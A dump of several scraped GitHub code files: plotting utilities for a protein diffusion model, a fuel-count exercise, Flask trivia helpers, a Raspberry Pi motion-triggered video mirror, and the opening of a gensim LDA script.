color='blue',\n linewidth=0, alpha=1)\n ax.scatter(train_vals[i, i], gen_vals[i, i], color='red',\n linewidth=0, alpha=1)\n # plt.scatter(train_diag_vals, gen_diag_vals, color='red', s=8, linewidth=0, label=\"Same AA\", alpha=0.5)\n ax.set_xlabel(\"True AA Substitution Rate\")\n ax.set_ylabel(\"Gen AA Substitution Rate\")\n # ax.legend(loc='upper left', frameon=False, handlelength=0, handletextpad=0)\n ax.text(0.05, 0.95, label, transform=ax.transAxes, fontsize=14,\n verticalalignment='top')\n subplots = 6 * 5\n for j in range(subplots - len(alphabet)):\n fig.delaxes(axes.ravel()[subplots - (j + 1)])\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, 'substitution_per_AA.svg'))\n fig.savefig(os.path.join(out_path, 'substitution_per_AA.png'))\n\n\n # Plot for all data\n fig, ax = plt.subplots(figsize=(3, 2.5))\n r_squared = stats.pearsonr(train_vals.flatten(), gen_vals.flatten()).statistic\n label = \"$R$=%.2f\" % (r_squared)\n plt.scatter(train_vals, gen_vals, color='blue', linewidth=0, label=\"$R^2$=%.2f\" % (r_squared), alpha=0.5)\n plt.plot([0, vmax], [0, vmax], linewidth=1, color='black', linestyle=\"--\")\n plt.xlabel(\"True AA Substitution Rate\")\n plt.ylabel(\"Gen AA Substitution Rate\")\n ax.text(0.05, 0.95, label, transform=ax.transAxes, fontsize=14,\n verticalalignment='top')\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, 'substitution_nondiag.svg'))\n fig.savefig(os.path.join(out_path, 'substitution_nondiag.png'))\n\n # Plot only same AA substitutions\n fig, ax = plt.subplots(figsize=(3, 2.5))\n r_squared = stats.pearsonr(train_diag_vals, gen_diag_vals).statistic\n label = \"$R$=%.2f\" % (r_squared)\n plt.scatter(train_diag_vals, gen_diag_vals, color='red', linewidth=0, label=\"$R^2$=%.2f\" % (r_squared), alpha=1)\n plt.plot([0, vmax], [0, vmax], linewidth=1, color='black', linestyle=\"--\")\n plt.xlabel(\"True AA Substitution Rate\")\n plt.ylabel(\"Gen AA Substitution Rate\")\n ax.text(0.05, 0.95, label, transform=ax.transAxes, fontsize=14,\n verticalalignment='top')\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, 'substitution_diag.svg'))\n fig.savefig(os.path.join(out_path, 'substitution_diag.png'))\n\ndef msa_pairwise_interactions(generated_msa, train_msa, all_aa, out_path): # Look at AA pairwise interactions within each MSA within each sample\n \"Pairwise plots for MSAs\"\n all_aa_pairs = list(itertools.product(all_aa, all_aa))\n all_aa_dict = {''.join(k): 1 for k in all_aa_pairs}\n all_aa_dict = {k: all_aa_dict[k] for k in sorted(all_aa_dict.keys())}\n\n all_pairs_train = get_pairwise(train_msa, all_aa)\n\n count_map_train = {}\n for i in all_pairs_train:\n i = ''.join(i)\n count_map_train[i] = count_map_train.get(i, 0) + 1\n\n for aa_pair in all_aa_dict.keys():\n if aa_pair not in count_map_train.keys():\n count_map_train[aa_pair] = 0\n\n train_dict = {k: count_map_train[k] for k in sorted(count_map_train.keys())}\n total_train = sum(train_dict.values())\n for k in train_dict.keys():\n train_dict[k] = train_dict[k] / total_train\n\n all_pairs_gen = get_pairwise(generated_msa, all_aa)\n\n count_map_gen = {}\n for i in all_pairs_gen:\n i = ''.join(i)\n count_map_gen[i] = count_map_gen.get(i, 0) + 1\n\n for aa_pair in all_aa_dict.keys():\n if aa_pair not in count_map_gen.keys():\n count_map_gen[aa_pair] = 0\n\n gen_dict = {k: count_map_gen[k] for k in sorted(count_map_gen.keys())}\n total_gen = sum(gen_dict.values())\n for k in gen_dict.keys():\n gen_dict[k] = gen_dict[k] / total_gen\n\n train_vals = list(train_dict.values())\n gen_vals = list(gen_dict.values())\n\n r_squared = stats.pearsonr(train_vals, gen_vals).statistic\n\n fig, ax = plt.subplots(figsize=(3, 2.5))\n label = \"$R$=%.2f\" % (r_squared)\n plt.plot([0, 0.02], [0, 0.02], linewidth=1, color='black', linestyle=\"--\")\n plt.scatter(train_vals, gen_vals, color='blue', linewidth=0, alpha=0.5) # marker = alpha\n plt.xlabel(\"True Parwise Interactions\")\n plt.ylabel(\"Gen Parwise Interactions\")\n ax.text(0.05, 0.95, label, transform=ax.transAxes, fontsize=14,\n verticalalignment='top')\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, 'pairwise.svg'))\n fig.savefig(os.path.join(out_path, 'pairwise.png'))\n\ndef plot_tmscores(tmscore_path, out_path, y_min=0, y_max=30):\n \"TMscores for conditionally generated sequences, given MSAs\"\n tmscores = pd.read_csv(tmscore_path, names=['scores'])\n fig, ax = plt.subplots(figsize=(3, 2.5))\n sns.histplot(tmscores['scores'], color='blue')\n plt.xlabel('TM Scores')\n plt.xlim(0, 1)\n plt.ylim(y_min,y_max)\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, 'tmscores.svg'))\n fig.savefig(os.path.join(out_path, 'tmscores.png'))\n\ndef plot_perp_group_masked(df, save_name, mask='mask'):\n \"Plot perplexity computed from Masked models, binned by % of sequence masked \"\n bins = np.arange(0, 1.1, 0.1)\n df['binned'] = pd.cut(df['time'], bins)\n group = df.groupby(pd.cut(df['time'], bins))\n plot_centers = (bins[:-1] + bins[1:]) / 2\n plot_values = np.exp(group['loss'].sum()/group['tokens'].sum())\n fig, ax = plt.subplots(figsize=(3, 2.5))\n plt.plot(plot_centers*100, plot_values, c='b', marker='o')\n ax.set_xticks([100, 80, 60, 40, 20, 0])\n if mask=='causal-mask':\n plt.gca().invert_xaxis()\n plt.xlabel('% Sequence')\n else:\n ax.set_xticks([0, 20, 40, 60, 80, 100])\n plt.xlabel('% Masked')\n plt.ylabel('Perplexity')\n plt.ylim(0,25)\n plt.tight_layout()\n fig.savefig(os.path.join('plots/perp_'+save_name+'.png'))\n\ndef plot_perp_group_d3pm(df, save_name):\n \"Plot perplexity computed from D3PM models, binned by timestep intervals\"\n bins = np.arange(0, 550, 50)\n df['binned'] = pd.cut(df['time'], bins)\n group = df.groupby(pd.cut(df['time'], bins))\n plot_centers = (bins[:-1] + bins[1:]) / 2\n plot_values = np.exp(group['loss'].sum()/group['tokens'].sum())\n fig, ax = plt.subplots(figsize=(3, 2.5))\n plt.plot(plot_centers, plot_values, c='b', marker='o')\n ax.set_xticks([0, 100, 200, 300, 400, 500])\n plt.xlabel('Timestep')\n plt.ylabel('Perplexity')\n plt.ylim(0, 25)\n plt.tight_layout()\n fig.savefig(os.path.join('plots/perp_' + save_name + '.png'))\n\n\ndef plot_ecdf_bylength(perp_groups, colors, labels, seq_lengths, metric='perp', model='esm-if'):\n \"Plots cumulative density as a function of sequence length\"\n fig, ax = plt.subplots(1,4, figsize=(8.,2.5), sharey=True, sharex=True)\n for j, perp_group in enumerate(perp_groups):\n for i,p in enumerate(perp_group):\n c=colors[j]\n sns.ecdfplot(x=p,\n label=labels[j],\n color=c,\n alpha=1,\n ax=ax[i])\n if metric=='perp':\n ax[i].set_xlabel(model+' Perplexity')\n elif metric=='plddt':\n ax[i].set_xlabel(model+' pLDDT')\n ax[i].set_title(\"seq length=\"+str(seq_lengths[i]))\n ax[i].axvline(x=np.mean(perp_groups[0][i]), c='k', ls='--', lw=0.75)\n ax[-1].legend(fontsize=8, loc='upper left')\n if model == 'ESM-IF':\n plt.xlim(0, 25)\n elif model == 'MPNN':\n plt.xlim(0, 6)\n elif model == 'Omegafold':\n plt.xlim(10, 100)\n plt.tight_layout()\n fig.savefig(os.path.join('plots/sc_'+metric+'_bylength_'+model+'.svg'))\n fig.savefig(os.path.join('plots/sc_'+metric+'_bylength_'+model+'.png'))\n\ndef plot_sc_boxplot(perp_groups, colors, labels, metric='perp', model='ESM-IF', length_model='small', legend=False):\n fig, ax = plt.subplots(1, 1, figsize=(3,3.5), sharey=True, sharex=True)\n all_perp = []\n all_names = []\n all_colors = []\n for i, perp_group in enumerate(perp_groups):\n [all_perp.append(item) for item in list(chain.from_iterable(perp_group))]\n [all_names.append(labels[i]) for _ in range(len(list(chain.from_iterable(perp_group))))]\n all_colors.append(colors[i])\n\n df = pd.DataFrame()\n df['value'] = all_perp\n df['names'] = all_names\n sns.boxplot(data=df, x=\"names\", y=\"value\", ax=ax, palette=all_colors)\n\n ax.axhline(y=np.median(list(chain.from_iterable(perp_groups[0]))), c='k', ls='--', lw=0.75)\n ax.set_xticklabels(ax.get_xticklabels(), rotation=45, horizontalalignment='right')\n\n if legend:\n ax.legend()\n if model == 'ESM-IF':\n ax.set_ylim(0, 25)\n elif model == 'MPNN':\n ax.set_ylim(0, 6)\n elif model == 'Omegafold':\n ax.set_ylim(10, 100)\n plt.tight_layout()\n fig.savefig(os.path.join('plots/sc_' + metric + '_' + model + '_' + length_model + '.svg'))\n fig.savefig(os.path.join('plots/sc_' + metric + '_' + model + '_' + length_model + '.png'))\n\ndef plot_ecdf(perp_groups, colors, labels, metric='perp', model='ESM-IF', length_model='small', legend=False):\n \"Plot cumulative density plot of plddt, or perp scores for each set of gen sequences\"\n fig, ax = plt.subplots(1,1, figsize=(2.5,2.5), sharey=True, sharex=True)\n for i, perp_group in enumerate(perp_groups):\n c = colors[i]\n all_perp = list(chain.from_iterable(perp_group))\n sns.ecdfplot(x=all_perp,\n label=labels[i],\n color=c,\n alpha=1,\n ax=ax)\n if metric == 'perp':\n ax.set_xlabel(model + ' Perplexity')\n elif metric == 'plddt':\n ax.set_xlabel(model + ' pLDDT')\n ax.set_title(\"all sequences\")\n ax.axvline(x=np.mean(list(chain.from_iterable(perp_groups[0]))), c='k', ls='--', lw=0.75)\n if legend:\n ax.legend()\n if model=='ESM-IF':\n ax.set_xlim(0,25)\n elif model == 'MPNN':\n ax.set_xlim(0,6)\n elif model == 'Omegafold':\n ax.set_xlim(10, 100)\n plt.tight_layout()\n fig.savefig(os.path.join('plots/sc_'+metric+'_'+model+'_'+length_model+'.svg'))\n fig.savefig(os.path.join('plots/sc_'+metric+'_'+model+'_'+length_model+'.png'))\n\ndef plot_plddt_perp(ordered_plddt_group, ordered_perp_group, idx, colors, labels, perp_model='ESM-IF', length_model='small'):\n \"Plot pLDDT vs Perplexity for each set of generated sequences against train data\"\n fig, ax = plt.subplots(1, 1, figsize=(3, 2.5), sharey=True, sharex=True)\n plt.scatter(ordered_plddt_group[0], ordered_perp_group[0], c=colors[0], s=20, alpha=1, label=labels[0], edgecolors='grey')\n plt.scatter(ordered_plddt_group[idx], ordered_perp_group[idx], c=colors[idx], s=20, alpha=1, label=labels[idx], edgecolors='k')\n plt.ylim(0, 25)\n plt.xticks([25, 50, 75, 100])\n ax.set_ylabel(perp_model + ' Perplexity')\n ax.set_xlabel('pLDDT')\n plt.tight_layout()\n fig.savefig(os.path.join('plots/sc_plddt_perp_'+labels[idx]+'_'+length_model+'.svg'))\n fig.savefig(os.path.join('plots/sc_plddt_perp_'+labels[idx]+'_'+length_model+'.png'))\n\ndef ss_helix_strand(runs, data, labels, save_name):\n \"2D Probability Density plots for DSSP 3-state predictions of % Helix and % Sheet\"\n fig, ax = plt.subplots(nrows=3, ncols=4, figsize=(10, 7), constrained_layout=True, sharex=False, sharey=False)\n ax = ax.ravel()\n for i, run in enumerate(runs):\n helix = data[data['type'] == run]['helix_percent']\n strand = data[data['type'] == run]['strand_percent']\n\n plt.rcParams['axes.titley'] = 1.0 # y is in axes-relative coordinates.\n plt.rcParams['axes.titlepad'] = -14\n ax[i].set_title(labels[i])\n\n sns.kdeplot(x=helix, y=strand,\n fill=True, thresh=0.001, levels=10,\n cmap='Greys', ax=ax[i], cbar=False, common_norm=True)\n ax[i].set_xlabel('% Helix per Seq')\n ax[i].set_ylabel('% Strand per Seq')\n ax[i].set_xlim(-0.05, 1)\n ax[i].set_ylim(-0.05, 1)\n #plt.tight_layout()\n fig.savefig(os.path.join('plots/helix_strand_' + save_name + '.svg'))\n fig.savefig(os.path.join('plots/helix_strand_' + save_name + '.png'))\n\ndef ss_box_whisker(data, colors, save_name):\n \"Create box and whisker plot for DSSP 3-state secondary structure predictions\"\n fig, ax = plt.subplots(1, 3, figsize=(7, 3.5), sharex=True, sharey=True)\n sns.boxplot(data=data, x=\"helix_percent\", y=\"type\", ax=ax[0], palette=colors)\n sns.boxplot(data=data, x=\"strand_percent\", y=\"type\", ax=ax[1], palette=colors)\n sns.boxplot(data=data, x=\"other_percent\", y=\"type\", ax=ax[2], palette=colors)\n ax[0].set_xlabel('% Helix per Sequence')\n ax[1].set_xlabel('% Strand per Sequence')\n ax[2].set_xlabel('% Loop per Sequence')\n [ax[i].set_ylabel(None) for i in range(len(ax))]\n plt.tight_layout()\n fig.savefig(os.path.join('plots/' + save_name + '_structure_box.svg'))\n fig.savefig(os.path.join('plots/' + save_name + '_structure_box.png'))\n\ndef plot_embedding(train_emb, run_emb, colors, i, runs, project_run):\n \"Plot embedding space of sequences as 2D TSNE \"\n fig, ax = plt.subplots(figsize=(5, 5))\n # Plot test\n plt.scatter(train_emb[:, 0][::10], train_emb[:, 1][::10], s=20, alpha=1, c=colors[0],\n edgecolors='grey')\n # Plot run\n plt.scatter(run_emb[:, 0], run_emb[:, 1], s=20, alpha=0.95,\n c=colors[i+1], edgecolors='k')\n ax.axis('off')\n fig.savefig(os.path.join('plots/fid_' + runs[i+1] + '_' + project_run + '.svg'))\n fig.savefig(os.path.join('plots/fid_' + runs[i+1] + '_' + project_run + '.png'))\n\ndef clean_list(list):\n cleanedList = [x for x in list if x ==x]\n return cleanedList\n\ndef plot_percent_similarity(all_df, colors, legend=False):\n fig, ax = plt.subplots(1, 1, figsize=(2.5, 2.5), sharey=True, sharex=True)\n #sns.set_palette(sns.color_palette(\"viridis\", len(runs)))\n sns.ecdfplot(all_df, ax=ax, legend=legend, palette=colors)\n #f = sns.boxplot([all_df['Valid MSA'].dropna(), all_df['Cond Max'].dropna(), all_df['Cond Rand'].dropna()],\n # ax=ax, palette=colors)\n #f.set(xticklabels=['Valid MSA', 'Cond Max', 'Cond Rand'])\n ax.set_xlabel('% Similarity to Original MSA')\n ax.axvline(x=25, c='k', ls='--', lw=0.75)\n ax.set_title(\"% Sim\")\n plt.tight_layout()\n fig.savefig(os.path.join('plots/simmsa.svg'))\n fig.savefig(os.path.join('plots/simmsa.png'))\n\ndef plot_conditional_tmscores(tm_df, palette, legend=False, save_path='plots/'):\n fig, ax = plt.subplots(1, 1, figsize=(2.5, 2.5), sharey=True, sharex=True)\n sns.ecdfplot(tm_df, palette=palette, ax=ax, legend=legend)\n ax.set_title(\" \")\n ax.axvline(x=0.5, c='k', ls='--', lw=0.75)\n plt.xlim(0,1)\n ax.set_ylabel('CDF')\n ax.set_xlabel('TM Score')\n plt.tight_layout()\n fig.savefig(os.path.join(save_path+'_tmscore.svg'))\n fig.savefig(os.path.join(save_path+'_tmscore.png'))\n\ndef plot_conditional_rmsd(pdb, motif_df, out_path='plots/'):\n fig, ax = plt.subplots(1, 3, figsize=(7.5, 2.5))\n ax[0].scatter(motif_df['scaffold_lengths'], motif_df['rmsd'], edgecolors='grey', c='#D0D0D0')\n ax[0].set_xlabel('Scaffold Lengths')\n ax[0].set_ylabel(r'Motif RMSD ($\\AA$)')\n ax[1].scatter(motif_df['scores'], motif_df['rmsd'], edgecolors='grey', c='#D0D0D0')\n ax[1].set_xlabel('pLDDT entire sequence')\n ax[1].set_ylabel(r'Motif RMSD ($\\AA$)')\n ax[2].scatter(motif_df['scores_fixed'], motif_df['rmsd'], edgecolors='grey', c='#527d99')\n ax[2].set_xlabel('pLDDT fixed region')\n ax[2].set_ylabel(r'Motif RMSD ($\\AA$)')\n ax[0].axhline(y=1, c='k', ls='--', lw=0.75)\n ax[1].axhline(y=1, c='k', ls='--', lw=0.75)\n ax[2].axhline(y=1, c='k', ls='--', lw=0.75)\n plt.title(\" \")\n ax[1].set_xlim(0, 100)\n ax[2].set_xlim(0, 100)\n plt.tight_layout()\n fig.savefig(os.path.join(out_path + pdb + '.png'))\n\ndef plot_conditional_sim(sim, out_path='plots/'):\n fig, ax = plt.subplots(figsize=(2.5, 2.5))\n sns.histplot(sim, color='grey', bins=10, ax=ax)\n plt.xlabel('% Seq similarity (Fixed)')\n plt.title(\" \")\n plt.xlim(0, 100)\n plt.tight_layout()\n fig.savefig(out_path + '_similarity.png')\n\ndef idr_parity_plot(mean_og_score, mean_gen_score, out_path):\n fig, ax = plt.subplots(figsize=(6, 2.5))\n r_squared = stats.pearsonr(mean_og_score, mean_gen_score).statistic\n label = \"$R$=%.2f\" % (r_squared)\n plt.axline([0, 0], [1, 1], c='k', linestyle='dotted', alpha=0.75)\n ax.text(0.05, 0.95, label, transform=ax.transAxes, fontsize=14,\n verticalalignment='top')\n plt.scatter(mean_og_score, mean_gen_score, c='grey', edgecolors='k')\n plt.xlabel(\"Per-Res Score True\", fontweight='bold')\n plt.ylabel(\"Per-Res Score Gen\", fontweight='bold')\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, 'idr_parity_scatter.svg'))\n fig.savefig(os.path.join(out_path, 'idr_parity_scatter.png'))\n plt.close()\n\ndef plot_idr(out_fpath, df, start, end, save_iter):\n fig, ax = plt.subplots(figsize=(6,3))\n plt.plot(df['resid'], df['score'], c='b')\n plt.axhline(y=0.5, c='k', ls='--')\n #plt.axvline(x=end, c='k', ls='--')\n plt.axvspan(start, end, alpha=0.1, color='b')\n plt.ylabel('score')\n plt.xlabel('residue')\n plt.tight_layout()\n fig.savefig(out_fpath+'idr_'+str(save_iter)+'.svg')\n fig.savefig(out_fpath+'idr_'+str(save_iter)+'.png')\n\ndef plot_idr_drbert(out_fpath, prefix, df, start, end, save_iter):\n fig, ax = plt.subplots(figsize=(6,3))\n x = np.arange(0,len(df['score'][save_iter]))\n plt.plot(x, df['score'][save_iter], c='b')\n #plt.axhline(y=0.5, c='k', ls='--')\n #plt.axvline(x=end, c='k', ls='--')\n plt.axvspan(start, end, alpha=0.1, color='b')\n plt.ylabel('score')\n plt.xlabel('residue')\n plt.ylim(0,1)\n plt.tight_layout()\n fig.savefig(out_fpath+'svg/'+prefix+str(save_iter)+'.svg')\n #fig.savefig(out_fpath+prefix+str(save_iter)+'.png')\n\n\ndef plot_idr_drbert_multiple(out_fpath, prefix, df, start, end, df2, start2, end2, save_iter):\n fig, ax = plt.subplots(figsize=(4,1.5))\n x = np.arange(0,len(df['score'][save_iter]))\n x2 = np.arange(0,len(df2['score'][save_iter]))\n plt.plot(x, df['score'][save_iter], c='#1E9AC7')\n plt.plot(x2, df2['score'][save_iter], c='grey')\n plt.axvspan(start, end, alpha=0.25, color='#1E9AC7')\n plt.ylabel('score')\n plt.xlabel('residue')\n plt.ylim(0,1)\n plt.tight_layout()\n fig.savefig(out_fpath+'svg/'+prefix+str(save_iter)+'.svg')\n\ndef idr_boxplot(gen_disorder_percent, gen_order_percent, out_fpath, save_name):\n fig, ax = plt.subplots(figsize=(3,3))\n f = sns.boxplot([gen_disorder_percent, gen_order_percent], ax=ax)\n f.set(xticklabels=['Disorder', 'Non-Disordered'])\n plt.ylim(0,1)\n plt.tight_layout()\n fig.savefig(out_fpath+save_name+'idr_box.svg')\n fig.savefig(out_fpath+save_name+'idr_box.png')\n\ndef idr_boxplot_all(df, out_fpath, save_name):\n print(df)\n fig, ax = plt.subplots(figsize=(3,3))\n f = sns.boxplot(data=df, x=\"region\", y=\"score\", hue='type', ax=ax)\n f.set(xticklabels=['Disorder', 'Non-Disordered'])\n plt.ylim(0,1)\n plt.tight_layout()\n fig.savefig(out_fpath+save_name+'idr_box.svg')\n fig.savefig(out_fpath+save_name+'idr_box.png')","repo_name":"microsoft/evodiff","sub_path":"evodiff/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":26006,"program_lang":"python","lang":"en","doc_type":"code","stars":323,"dataset":"github-code","pt":"48"} +{"seq_id":"15114314860","text":"alcool = 0\r\ngasol = 0\r\ndiesel = 0\r\nwhile True:\r\n x = int(input())\r\n if x == 4:\r\n break\r\n elif x == 1:\r\n alcool += 1\r\n elif x == 2:\r\n gasol += 1\r\n elif x == 3:\r\n diesel += 1\r\n\r\nprint(\"MUITO OBRIGADO\")\r\nprint(f\"Alcool: {alcool}\")\r\nprint(f\"Gasolina: {gasol}\")\r\nprint(f\"Diesel: {diesel}\")\r\n","repo_name":"GersonRS/beecrowd","sub_path":"Iniciante/python-solution/1134-tipo-de-combustivel/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"13267183320","text":"import csv\nimport urllib.request\n\nfrom functools import wraps\nfrom pytrivia import Category, Diffculty, Type, Trivia\nfrom flask import Flask, flash, redirect, render_template, request, session, url_for\nfrom flask_session import Session\nfrom cs50 import SQL\nfrom passlib.apps import custom_app_context as pwd_context\nfrom tempfile import mkdtemp\n\n\n\n# configure CS50 Library to use SQLite database\ndb = SQL(\"sqlite:///finance.db\")\n\ndef apology(message, code=400):\n \"\"\"Renders message as an apology to user.\"\"\"\n def escape(s):\n \"\"\"\n Escape special characters.\n\n https://github.com/jacebrowning/memegen#special-characters\n \"\"\"\n for old, new in [(\"-\", \"--\"), (\" \", \"-\"), (\"_\", \"__\"), (\"?\", \"~q\"),\n (\"%\", \"~p\"), (\"#\", \"~h\"), (\"/\", \"~s\"), (\"\\\"\", \"''\")]:\n s = s.replace(old, new)\n return s\n return render_template(\"apology.html\", top=code, bottom=escape(message)), code\n\ndef succes(message, code=200):\n \"\"\"Renders message as an apology to user.\"\"\"\n def escape(s):\n \"\"\"\n Escape special characters.\n\n https://github.com/jacebrowning/memegen#special-characters\n \"\"\"\n for old, new in [(\"-\", \"--\"), (\" \", \"-\"), (\"_\", \"__\"), (\"?\", \"~q\"),\n (\"%\", \"~p\"), (\"#\", \"~h\"), (\"/\", \"~s\"), (\"\\\"\", \"''\")]:\n s = s.replace(old, new)\n return s\n return render_template(\"succes.html\", top=code, bottom=escape(message)), code\n\n\ndef login_required(f):\n \"\"\"\n Decorate routes to require login.\n\n http://flask.pocoo.org/docs/0.12/patterns/viewdecorators/\n \"\"\"\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if session.get(\"user_id\") is None:\n return redirect(\"/login\")\n return f(*args, **kwargs)\n return decorated_function\n\ndef score(answer):\n \"\"\"Adds points for correct answer\"\"\"\n # select table\n portfolio = db.execute(\"SELECT * FROM portfolio WHERE id = :id\", id=session[\"user_id\"])\n\n # check if answer is correct\n user_answer = answer\n real_answer = portfolio[-1][\"answer\"]\n if user_answer == real_answer:\n db.execute(\"UPDATE score set total_score=total_score+1 WHERE id=:id\", \\\n id=session[\"user_id\"])\n db.execute(\"UPDATE score set session_score=session_score+1 WHERE id=:id\", \\\n id=session[\"user_id\"])\n\ndef qinit():\n \"\"\"Initializes all but the first question\"\"\"\n # select table\n portfolio = db.execute(\"SELECT * FROM portfolio WHERE id = :id\", id=session[\"user_id\"])\n\n # setup question config\n cat = portfolio[-1][\"category\"]\n dif = portfolio[-1][\"difficulty\"]\n questiontype = portfolio[-1][\"qtype\"]\n qnumber = int(portfolio[-1][\"qnumber\"]) - 1\n config = [cat, dif, questiontype, qnumber]\n return (config)\n\ndef outofq():\n \"\"\"Checks if out of questions\"\"\"\n\n # delete session from portfolio and return total score\n delete_portfolio = db.execute(\"DELETE FROM portfolio WHERE id = :id\", id=session[\"user_id\"])\n u_score = db.execute(\"SELECT total_score FROM score WHERE id = :id\", id=session[\"user_id\"])\n s_score = db.execute(\"SELECT session_score FROM score WHERE id = :id\", id=session[\"user_id\"])\n return [u_score, s_score]\n\ndef sconfigmulti(answers, cat, questiontype, dif, qnumber, correct_answer):\n # insert data into portfolio for respective questiontypes\n asked = db.execute(\"INSERT INTO portfolio (id, answer, category, qtype, difficulty, qnumber) \\\n VALUES(:id, :answers, :category, :qtype, :difficulty, :qnumber)\", \\\n answers = correct_answer, category = cat, qtype = questiontype, \\\n difficulty = dif, qnumber = qnumber, id=session[\"user_id\"])\n\ndef sconfigtf(answers, cat, questiontype, dif, qnumber, correct_answer):\n # insert data into portfolio for respective questiontypes\n asked = db.execute(\"INSERT INTO portfolio (id, answer, category, qtype, difficulty, qnumber) \\\n VALUES(:id, :answers, :category, :qtype, :difficulty, :qnumber)\", \\\n answers = correct_answer, category = cat, qtype =questiontype, \\\n difficulty = dif, qnumber = qnumber, id=session[\"user_id\"] )\n\ndef delsession():\n # delete session from portfolio\n db.execute(\"DELETE FROM portfolio WHERE id = :id\", id=session[\"user_id\"])\n\ndef session_score():\n # set user id into score table\n score = db.execute(\"INSERT INTO score (id) VALUES (:id)\", id=session[\"user_id\"])\n\ndef q_score():\n # return session score\n score = db.execute(\"SELECT session_score FROM score WHERE id = :id\", id=session[\"user_id\"])\n return score[0][\"session_score\"]\n\ndef reset_score():\n # reset session score\n db.execute(\"UPDATE score set session_score=0 WHERE id=:id\", \\\n id=session[\"user_id\"])\n\ndef leaders():\n # lookup top 5 scores\n one = db.execute(\"SELECT * FROM score ORDER BY total_score DESC LIMIT 0, 5\")\n two = db.execute(\"SELECT * FROM score ORDER BY total_score DESC LIMIT 0, 5\")\n three = db.execute(\"SELECT * FROM score ORDER BY total_score DESC LIMIT 0, 5\")\n four = db.execute(\"SELECT * FROM score ORDER BY total_score DESC LIMIT 0, 5\")\n five = db.execute(\"SELECT * FROM score ORDER BY total_score DESC LIMIT 0, 5\")\n\n return [one, two, three, four, five]\n\ndef leader_names(top):\n # set id's of top 5 scores\n row_1 = top[1][0][\"id\"]\n row_2 = top[1][1][\"id\"]\n row_3 = top[1][2][\"id\"]\n row_4 = top[1][3][\"id\"]\n row_5 = top[1][4][\"id\"]\n\n # lookup names associated with top 5 scores\n name_1 = db.execute(\"SELECT username FROM users WHERE id = :id\", id=row_1)\n name_2 = db.execute(\"SELECT username FROM users WHERE id = :id\", id=row_2)\n name_3 = db.execute(\"SELECT username FROM users WHERE id = :id\", id=row_3)\n name_4 = db.execute(\"SELECT username FROM users WHERE id = :id\", id=row_4)\n name_5 = db.execute(\"SELECT username FROM users WHERE id = :id\", id=row_5)\n\n return [name_1, name_2, name_3, name_4, name_5]\n","repo_name":"IIVolumeII/webik-14","sub_path":"trivia/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31100390432","text":"import os\nimport random\nfrom time import sleep\nfrom gpiozero import MotionSensor\n\n#Clear console and turn off blinking cursor\n#This makes for a completely black screen behind the mirror\nos.system(\"clear\")\nos.system(\"setterm --cursor off\")\n\n#Set motion Sensor GPIO 17\npir = MotionSensor(17)\n\n#path where videos are located\nfolderPath = \"/home/pi/Videos/\"\n\n#List of File Names of Videos in folder\nvideos = [\"BC_FearTheReaper_Holl_V.mp4\",\n \"BC_GatheringGhouls_Holl_V.mp4\", \n \"PP_StartleScare1_Wall_Spotlight_V.mp4\",\n \"PP_StartleScare2_Wall_Spotlight_V.mp4\",\n \"PP_StartleScare3_Wall_Spotlight_V.mp4\"]\n\n#VLC Command for starting the video with options\n# \"--quiet\" Turn off all messages on the console.\n# \"--no-osd\" No on-screen display (disables title of video from displaying)\n# \"-f\" fullscreen\n# \"--autoscale\" Let the video scale to fit a given window or fullscreen.\n# https://wiki.videolan.org/VLC_command-line_help/\nvlcCommandStart = \"vlc --quiet --no-osd -f --autoscale file://\"\n\n#End of the VLC Command after the file being played.\n# \"vlc://quit\" Close VLC after video is done\n# \">/dev/null 2>&1\" redirect all console output to null\nvlcCommandEnd = \" vlc://quit >/dev/null 2>&1\"\n\ntry: \n while True: # this will carry on until you hit CTRL+C \n os.system(\"clear\")\n \n #Wait for motion sensor\n pir.wait_for_motion()\n \n #Give time to look at mirror reflection\n # wait 3 seconds \n sleep(3)\n\n #Get video at random from list\n video = random.choice(videos) \n #Create command to play video by concatenating command variables.\n videoCommand = vlcCommandStart + folderPath + video + vlcCommandEnd \n #Run VLC command from BASH Shell/Terminal\n os.system(videoCommand)\n \n #After video plays let relfection \n #show before playing another video\n #wait 3 seconds \n sleep(3)\n\n #wait for motion sensor to deactivate\n #pir.wait_for_no_motion() \n\n# this block will run no matter how the try block exits\nfinally:\n # clean up after yourself\n GPIO.cleanup()","repo_name":"andyrblank/HalloweenMirror","sub_path":"mirrorScript.py","file_name":"mirrorScript.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71640823186","text":"import MLfunctions as mlf\r\nimport gensim\r\nfrom gensim import corpora\r\nfrom gensim.models import Doc2Vec,Word2Vec,TfidfModel\r\nfrom gensim.models.doc2vec import TaggedDocument\r\nfrom gensim.utils import simple_preprocess\r\nfrom gensim.models import CoherenceModel\r\nfrom nltk.corpus import stopwords\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os\r\nimport sys\r\nimport seaborn as sns\r\nimport matplotlib.colors as mcolors\r\n\r\nsw=stopwords.words('spanish')\r\npathtohere=os.getcwd()\r\n\r\n\r\ndef main():\r\n print('LDA model with gensim')\r\n print('1) 1 gram, 2) 2 gram, 3) 3 gram, 4) Ranking of coherence')\r\n op=input()\r\n op=int(op)\r\n #28 topics, optimum result (27 topics are really 28, 0 to 27)\r\n numberTopic=5\r\n lsReturn=[]\r\n lsDocuments=[]\r\n lsSubject=[]\r\n #lsNoThesis=[]\r\n #Get the the information into a list of documents\r\n lsReturn=mlf.getRawTextToList()\r\n lsDocuments=lsReturn[0]\r\n lsSubject=lsReturn[1]\r\n #lsNoThesis=lsReturn[2]\r\n #Read the unwanted words and then add them up to stopwords\r\n lsUnWantedWords=[]\r\n 